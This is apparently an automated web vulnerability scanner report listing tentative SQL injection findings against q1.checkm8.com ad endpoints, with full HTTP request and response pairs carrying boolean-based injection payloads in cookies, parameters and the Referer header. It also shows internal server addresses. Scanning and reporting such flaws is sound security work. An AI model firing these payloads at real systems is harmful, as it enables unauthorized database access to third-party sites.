GET /pagead/ads?client=ca-pub-7832112837345590&output=html&h=90&slotname=9104404504&w=728&lmt=1316256718&flash=10.3.183&url=http%3A%2F%2Fwww.toofab.com%2F%00''&dt=1316238718628&bpp=11&shv=r20110907&jsv=r20110914&correlator=1316238718686&frm=4&adk=3292020828&ga_vid=1160930501.1316238719&ga_sid=1316238719&ga_hid=1889546765&ga_fc=0&u_tz=-300&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=20&u_nmime=100&dff=arial&dfs=16&biw=1071&bih=870&prodhost=googleads.g.doubleclick.net&fu=0&ifi=1&dtd=144&xpc=u82iW5Sevj&p=http%3A//www.toofab.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response 2

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 17 Sep 2011 00:55:21 GMT
Server: cafe
Cache-Control: private
Content-Length: 3806
X-XSS-Protection: 1; mode=block

<!doctype html><html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=functio
...[SNIP]...

1.13. http://q1.checkm8.com/adam/detect [C cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://q1.checkm8.com
Path:   /adam/detect

Issue detail

The C cookie appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the C cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /adam/detect?cat=Boston_Herald.Track.Front&page=009300128789618611&serial=1000:1:A&&LOC=http://bostonherald.com/track/&WIDTH=1087&HEIGHT=870&WIDTH_RANGE=WR_D&DATE=01110917&HOUR=01&RES=RS21&ORD=061694151954725385&req=fr&& HTTP/1.1
Host: q1.checkm8.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/track/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: dt=97,20110913120144,OS=WIN7&FL=FL10&JE=1&UL=en&RES=RS21&CE=1315915303; R=cHONU9wbaaaaa%00%00%00aa; A=dvV7X9wA5Q7MvENT06Sba; C=ovV7X9we5HXUcgaIa4OQ95t'%20and%201%3d1--%20; O=evV7X9wkgMMSg3IdGwNbO0jnNbnU3Lca

Response 1

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:20:56 GMT
Server: Apache
P3P: policyref="http://q1.checkm8.com/w3c/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV STA OTC"
x-internal-server: 192.168.212.15 NY-AD5
Set-cookie: A=dvV7X9wQ0M8MvENT06Sba;Path=/;
Set-cookie: C=oBK8X9we5HXUcgaJa4OQ95t;Path=/;Expires=Fri, 01-Feb-2075 04:54:15 GMT;
x-internal-browser: CH0
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.q1.checkm8.com
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.checkm8.com
x-internal-id: 143300170/1217096312/1137740046/2570514078
x-internal-selected:
x-internal-error: NO VALID CATEGORY NAME
Cache-Control: no-cache, no-store, max-age=0
Vary: Accept-Encoding
Content-Length: 3
Connection: close
Content-Type: application/javascript

...

Request 2

GET /adam/detect?cat=Boston_Herald.Track.Front&page=009300128789618611&serial=1000:1:A&&LOC=http://bostonherald.com/track/&WIDTH=1087&HEIGHT=870&WIDTH_RANGE=WR_D&DATE=01110917&HOUR=01&RES=RS21&ORD=061694151954725385&req=fr&& HTTP/1.1
Host: q1.checkm8.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/track/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: dt=97,20110913120144,OS=WIN7&FL=FL10&JE=1&UL=en&RES=RS21&CE=1315915303; R=cHONU9wbaaaaa%00%00%00aa; A=dvV7X9wA5Q7MvENT06Sba; C=ovV7X9we5HXUcgaIa4OQ95t'%20and%201%3d2--%20; O=evV7X9wkgMMSg3IdGwNbO0jnNbnU3Lca

Response 2

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:20:56 GMT
Server: Apache
P3P: policyref="http://q1.checkm8.com/w3c/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV STA OTC"
x-internal-server: 192.168.212.15 NY-AD5
Set-cookie: C=oBK8X9we5HXUcgaJa4OQ95t;Path=/;Expires=Fri, 01-Feb-2075 04:54:15 GMT;
x-internal-browser: CH0
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.q1.checkm8.com
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.checkm8.com
x-internal-id: 143300170/1217096312/1137740046/2570514078
x-internal-selected:
x-internal-error: NO VALID CATEGORY NAME
Cache-Control: no-cache, no-store, max-age=0
Vary: Accept-Encoding
Content-Length: 3
Connection: close
Content-Type: application/javascript

...

1.14. http://q1.checkm8.com/adam/detect [WIDTH_RANGE parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://q1.checkm8.com
Path:   /adam/detect

Issue detail

The WIDTH_RANGE parameter appears to be vulnerable to SQL injection attacks. The payloads 20440401'%20or%201%3d1--%20 and 20440401'%20or%201%3d2--%20 were each submitted in the WIDTH_RANGE parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /adam/detect?cat=Boston_Herald.Track.Front&page=6802504919469357&serial=1000:1:A&&LOC=http://bostonherald.com/track/&WIDTH=1087&HEIGHT=870&WIDTH_RANGE=WR_D20440401'%20or%201%3d1--%20&DATE=01110917&HOUR=01&RES=RS21&ORD=6767618621233851&req=fr&& HTTP/1.1
Host: q1.checkm8.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/track/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: dt=97,20110913120144,OS=WIN7&FL=FL10&JE=1&UL=en&RES=RS21&CE=1315915303; R=cHONU9wbaaaaa%00%00%00aa; O=evV7X9wkgMMSg3IdGwNbO0jnNbnU3Lca; A=dvV7X9wOL36ZvENT06Sba; C=ouX7X9wuHKW7cgaJa4OQ95t

Response 1

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:29:51 GMT
Server: Apache
P3P: policyref="http://q1.checkm8.com/w3c/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV STA OTC"
x-internal-server: 192.168.212.19 ny-ad9
Set-cookie: A=dvV7X9wDYV63vENT06Sba;Path=/;
Set-cookie: C=ofT8X9w5U7VGdga6b4OQ95t;Path=/;Expires=Fri, 01-Feb-2075 05:03:11 GMT;
x-internal-browser: CH0
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.q1.checkm8.com
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.checkm8.com
x-internal-id: 174630063/1248394023/1137740046/2570514078
x-internal-selected:
x-internal-error: NO VALID CATEGORY NAME
Cache-Control: no-cache, no-store, max-age=0
Vary: Accept-Encoding
Content-Length: 3
Connection: close
Content-Type: application/javascript

...

Request 2

GET /adam/detect?cat=Boston_Herald.Track.Front&page=6802504919469357&serial=1000:1:A&&LOC=http://bostonherald.com/track/&WIDTH=1087&HEIGHT=870&WIDTH_RANGE=WR_D20440401'%20or%201%3d2--%20&DATE=01110917&HOUR=01&RES=RS21&ORD=6767618621233851&req=fr&& HTTP/1.1
Host: q1.checkm8.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/track/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: dt=97,20110913120144,OS=WIN7&FL=FL10&JE=1&UL=en&RES=RS21&CE=1315915303; R=cHONU9wbaaaaa%00%00%00aa; O=evV7X9wkgMMSg3IdGwNbO0jnNbnU3Lca; A=dvV7X9wOL36ZvENT06Sba; C=ouX7X9wuHKW7cgaJa4OQ95t

Response 2

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:29:52 GMT
Server: Apache
P3P: policyref="http://q1.checkm8.com/w3c/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV STA OTC"
x-internal-server: 192.168.212.19 ny-ad9
Set-cookie: C=ogT8X9w5U7VGdga7b4OQ95t;Path=/;Expires=Fri, 01-Feb-2075 05:03:12 GMT;
x-internal-browser: CH0
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.q1.checkm8.com
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.checkm8.com
x-internal-id: 174630063/1248394023/1137740046/2570514078
x-internal-selected:
x-internal-error: NO VALID CATEGORY NAME
Cache-Control: no-cache, no-store, max-age=0
Vary: Accept-Encoding
Content-Length: 3
Connection: close
Content-Type: application/javascript

...

1.15. http://q1.checkm8.com/adam/detect [cat parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://q1.checkm8.com
Path:   /adam/detect

Issue detail

The cat parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the cat parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /adam/detect?cat=Boston_Herald.Track.Front'%20and%201%3d1--%20&page=009300128789618611&serial=1000:1:A&&LOC=http://bostonherald.com/track/&WIDTH=1087&HEIGHT=870&WIDTH_RANGE=WR_D&DATE=01110917&HOUR=01&RES=RS21&ORD=061694151954725385&req=fr&& HTTP/1.1
Host: q1.checkm8.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/track/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: dt=97,20110913120144,OS=WIN7&FL=FL10&JE=1&UL=en&RES=RS21&CE=1315915303; R=cHONU9wbaaaaa%00%00%00aa; A=dvV7X9wA5Q7MvENT06Sba; C=ovV7X9we5HXUcgaIa4OQ95t; O=evV7X9wkgMMSg3IdGwNbO0jnNbnU3Lca

Response 1

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:20:06 GMT
Server: Apache
P3P: policyref="http://q1.checkm8.com/w3c/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV STA OTC"
x-internal-server: 192.168.212.19 ny-ad9
Set-cookie: A=dJJ8X9w40K63vtRS57Oca;Path=/;
Set-cookie: C=oNJ8X9wxYWVGdgaYa4OQ95t;Path=/;Expires=Fri, 01-Feb-2075 04:53:25 GMT;
x-internal-browser: CH0
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.q1.checkm8.com
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.checkm8.com
x-internal-id: 174609135/1248373032/1137740046/4118631499
x-internal-selected:
x-internal-error: NO VALID CATEGORY NAME
Cache-Control: no-cache, no-store, max-age=0
Vary: Accept-Encoding
Content-Length: 3
Connection: close
Content-Type: application/javascript

...

Request 2

GET /adam/detect?cat=Boston_Herald.Track.Front'%20and%201%3d2--%20&page=009300128789618611&serial=1000:1:A&&LOC=http://bostonherald.com/track/&WIDTH=1087&HEIGHT=870&WIDTH_RANGE=WR_D&DATE=01110917&HOUR=01&RES=RS21&ORD=061694151954725385&req=fr&& HTTP/1.1
Host: q1.checkm8.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/track/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: dt=97,20110913120144,OS=WIN7&FL=FL10&JE=1&UL=en&RES=RS21&CE=1315915303; R=cHONU9wbaaaaa%00%00%00aa; A=dvV7X9wA5Q7MvENT06Sba; C=ovV7X9we5HXUcgaIa4OQ95t; O=evV7X9wkgMMSg3IdGwNbO0jnNbnU3Lca

Response 2

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:20:06 GMT
Server: Apache
P3P: policyref="http://q1.checkm8.com/w3c/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV STA OTC"
x-internal-server: 192.168.212.19 ny-ad9
Set-cookie: C=oNJ8X9wxYWVGdgaZa4OQ95t;Path=/;Expires=Fri, 01-Feb-2075 04:53:25 GMT;
x-internal-browser: CH0
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.q1.checkm8.com
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.checkm8.com
x-internal-id: 174609135/1248373032/1137740046/4118631499
x-internal-selected:
x-internal-error: NO VALID CATEGORY NAME
Cache-Control: no-cache, no-store, max-age=0
Vary: Accept-Encoding
Content-Length: 3
Connection: close
Content-Type: application/javascript

...

1.16. http://q1.checkm8.com/adam/detect [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://q1.checkm8.com
Path:   /adam/detect

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads %20and%201%3d1--%20 and %20and%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /adam/detect?cat=Boston_Herald.Track.Front&page=009300128789618611&serial=1000:1:A&&LOC=http://bostonherald.com/track/&WIDTH=1087&HEIGHT=870&WIDTH_RANGE=WR_D&DATE=01110917&HOUR=01&RES=RS21&ORD=061694151954725385&req=fr&&&1%20and%201%3d1--%20=1 HTTP/1.1
Host: q1.checkm8.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/track/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: dt=97,20110913120144,OS=WIN7&FL=FL10&JE=1&UL=en&RES=RS21&CE=1315915303; R=cHONU9wbaaaaa%00%00%00aa; A=dvV7X9wA5Q7MvENT06Sba; C=ovV7X9we5HXUcgaIa4OQ95t; O=evV7X9wkgMMSg3IdGwNbO0jnNbnU3Lca

Response 1

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:21:05 GMT
Server: Apache
P3P: policyref="http://q1.checkm8.com/w3c/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV STA OTC"
x-internal-server: 192.168.212.16 NY-AD6
Set-cookie: A=dvV7X9wRIMMRvENT06Sba;Path=/;
Set-cookie: C=oLK8X9wHI86Ycga5a4OQ95t;Path=/;Expires=Fri, 01-Feb-2075 04:54:25 GMT;
x-internal-browser: CH0
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.q1.checkm8.com
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.checkm8.com
x-internal-id: 151275073/1225019603/1137740046/2570514078
x-internal-selected:
x-internal-error: NO VALID CATEGORY NAME
Cache-Control: no-cache, no-store, max-age=0
Vary: Accept-Encoding
Content-Length: 3
Connection: close
Content-Type: application/javascript

...

Request 2

GET /adam/detect?cat=Boston_Herald.Track.Front&page=009300128789618611&serial=1000:1:A&&LOC=http://bostonherald.com/track/&WIDTH=1087&HEIGHT=870&WIDTH_RANGE=WR_D&DATE=01110917&HOUR=01&RES=RS21&ORD=061694151954725385&req=fr&&&1%20and%201%3d2--%20=1 HTTP/1.1
Host: q1.checkm8.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/track/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: dt=97,20110913120144,OS=WIN7&FL=FL10&JE=1&UL=en&RES=RS21&CE=1315915303; R=cHONU9wbaaaaa%00%00%00aa; A=dvV7X9wA5Q7MvENT06Sba; C=ovV7X9we5HXUcgaIa4OQ95t; O=evV7X9wkgMMSg3IdGwNbO0jnNbnU3Lca

Response 2

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:21:05 GMT
Server: Apache
P3P: policyref="http://q1.checkm8.com/w3c/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV STA OTC"
x-internal-server: 192.168.212.16 NY-AD6
Set-cookie: C=oLK8X9wHI86Ycga6a4OQ95t;Path=/;Expires=Fri, 01-Feb-2075 04:54:25 GMT;
x-internal-browser: CH0
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.q1.checkm8.com
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.checkm8.com
x-internal-id: 151275073/1225019603/1137740046/2570514078
x-internal-selected:
x-internal-error: NO VALID CATEGORY NAME
Cache-Control: no-cache, no-store, max-age=0
Vary: Accept-Encoding
Content-Length: 3
Connection: close
Content-Type: application/javascript

...

1.17. http://q1.checkm8.com/adam/report [C cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://q1.checkm8.com
Path:   /adam/report

Issue detail

The C cookie appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the C cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /adam/report?38660&6091093090362847&http://bostonherald.com/news/&1316221635&Y&32_0_34_10_43_3_103_21_104_12_111_8_116_225_117_225024_118_1_120_4000000005_122_4225024005_280_22_282_0_283_0_&T&P HTTP/1.1
Host: q1.checkm8.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/news/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: dt=97,20110913120144,OS=WIN7&FL=FL10&JE=1&UL=en&RES=RS21&CE=1315915303; R=cHONU9wbaaaaa%00%00%00aa; O=evV7X9wmgMMSg3IdGwNbO0jnBsnU3LcIba; A=dvV7X9w7R98LvENT06Sba; C=on27X9w000YTchaOa4OQ95t'%20and%201%3d1--%20

Response 1

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:50:24 GMT
Server: Apache
P3P: policyref="http://q1.checkm8.com/w3c/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV STA OTC"
x-internal-server: 192.168.212.15 NY-AD5
Set-cookie: A=dvV7X9w11Q9MvENT06Sba;Path=/;
Set-cookie: C=o7H9X9wRUHZUchaPa4OQ95t;Path=/;Expires=Fri, 01-Feb-2075 05:23:43 GMT;
x-internal-browser: CH0
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.q1.checkm8.com
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.checkm8.com
x-internal-id: 143418691/1217163655/1137740046/2570514078
x-internal-error: TOO OLD
Cache-Control: no-cache, no-store, max-age=0
Vary: Accept-Encoding
Content-Length: 0
Connection: close
Content-Type: text/html

Request 2

GET /adam/report?38660&6091093090362847&http://bostonherald.com/news/&1316221635&Y&32_0_34_10_43_3_103_21_104_12_111_8_116_225_117_225024_118_1_120_4000000005_122_4225024005_280_22_282_0_283_0_&T&P HTTP/1.1
Host: q1.checkm8.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/news/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: dt=97,20110913120144,OS=WIN7&FL=FL10&JE=1&UL=en&RES=RS21&CE=1315915303; R=cHONU9wbaaaaa%00%00%00aa; O=evV7X9wmgMMSg3IdGwNbO0jnBsnU3LcIba; A=dvV7X9w7R98LvENT06Sba; C=on27X9w000YTchaOa4OQ95t'%20and%201%3d2--%20

Response 2

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:50:24 GMT
Server: Apache
P3P: policyref="http://q1.checkm8.com/w3c/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV STA OTC"
x-internal-server: 192.168.212.15 NY-AD5
Set-cookie: C=o7H9X9wRUHZUchaPa4OQ95t;Path=/;Expires=Fri, 01-Feb-2075 05:23:43 GMT;
x-internal-browser: CH0
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.q1.checkm8.com
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.checkm8.com
x-internal-id: 143418691/1217163655/1137740046/2570514078
x-internal-error: TOO OLD
Cache-Control: no-cache, no-store, max-age=0
Vary: Accept-Encoding
Content-Length: 0
Connection: close
Content-Type: text/html


1.18. http://q1.checkm8.com/adam/report [Referer HTTP header]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://q1.checkm8.com
Path:   /adam/report

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. The payloads 80156717'%20or%201%3d1--%20 and 80156717'%20or%201%3d2--%20 were each submitted in the Referer HTTP header. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /adam/report?38660&6091093090362847&http://bostonherald.com/news/&1316221635&Y&32_0_34_10_43_3_103_21_104_12_111_8_116_225_117_225024_118_1_120_4000000005_122_4225024005_280_22_282_0_283_0_&T&P HTTP/1.1
Host: q1.checkm8.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=80156717'%20or%201%3d1--%20
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: dt=97,20110913120144,OS=WIN7&FL=FL10&JE=1&UL=en&RES=RS21&CE=1315915303; R=cHONU9wbaaaaa%00%00%00aa; O=evV7X9wmgMMSg3IdGwNbO0jnBsnU3LcIba; A=dvV7X9w7R98LvENT06Sba; C=on27X9w000YTchaOa4OQ95t

Response 1

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:50:38 GMT
Server: Apache
P3P: policyref="http://q1.checkm8.com/w3c/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV STA OTC"
x-internal-server: 192.168.212.18 NY-AD8
Set-cookie: A=dvV7X9wiI18ZvENT06Sba;Path=/;
Set-cookie: C=omI9X9wB2HY7chadb4OQ95t;Path=/;Expires=Fri, 01-Feb-2075 05:23:58 GMT;
x-internal-browser: CH0
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.q1.checkm8.com
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.checkm8.com
x-internal-id: 167371135/1241135538/1137740046/2570514078
x-internal-error: TOO OLD
Cache-Control: no-cache, no-store, max-age=0
Vary: Accept-Encoding
Content-Length: 0
Connection: close
Content-Type: text/html

Request 2

GET /adam/report?38660&6091093090362847&http://bostonherald.com/news/&1316221635&Y&32_0_34_10_43_3_103_21_104_12_111_8_116_225_117_225024_118_1_120_4000000005_122_4225024005_280_22_282_0_283_0_&T&P HTTP/1.1
Host: q1.checkm8.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=80156717'%20or%201%3d2--%20
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: dt=97,20110913120144,OS=WIN7&FL=FL10&JE=1&UL=en&RES=RS21&CE=1315915303; R=cHONU9wbaaaaa%00%00%00aa; O=evV7X9wmgMMSg3IdGwNbO0jnBsnU3LcIba; A=dvV7X9w7R98LvENT06Sba; C=on27X9w000YTchaOa4OQ95t

Response 2

HTTP/1.1 200 OK
